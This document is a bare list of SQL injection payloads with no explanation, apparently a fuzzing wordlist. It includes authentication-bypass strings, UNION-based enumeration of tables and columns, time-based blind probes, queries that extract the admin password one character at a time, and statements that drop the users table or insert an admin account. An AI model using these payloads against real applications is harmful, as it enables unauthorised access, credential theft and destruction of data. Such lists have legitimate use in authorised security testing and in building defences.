' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
" OR "1"="1
" OR "1"="1" --
" OR "1"="1" /*
admin'--
admin"--
' OR 1=1--
" OR 1=1--
' UNION SELECT NULL--
" UNION SELECT NULL--
' UNION SELECT 1,2,3--
" UNION SELECT 1,2,3--
' AND (SELECT COUNT(*) FROM information_schema.tables)>0--
' AND (SELECT COUNT(*) FROM sysobjects)>0--
' AND (SELECT COUNT(*) FROM all_tables)>0--
'; WAITFOR DELAY '00:00:05'--
'; SELECT SLEEP(5)--
' AND (SELECT * FROM (SELECT(SLEEP(5)))ABCD)--
'; pg_sleep(5)--
' OR SLEEP(5)--
" OR SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
" AND IF(1=1,SLEEP(5),0)--
'; DROP TABLE users--
"; DROP TABLE users--
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
'; INSERT INTO users VALUES('admin','password')--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64--
' AND LENGTH((SELECT password FROM users WHERE username='admin'))>5--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT column_name FROM information_schema.columns--
' UNION SELECT username,password FROM users--
1'; SELECT user()--
1"; SELECT user()--
1' OR substring(@@version,1,1)='5'--
1" OR substring(@@version,1,1)='5'--
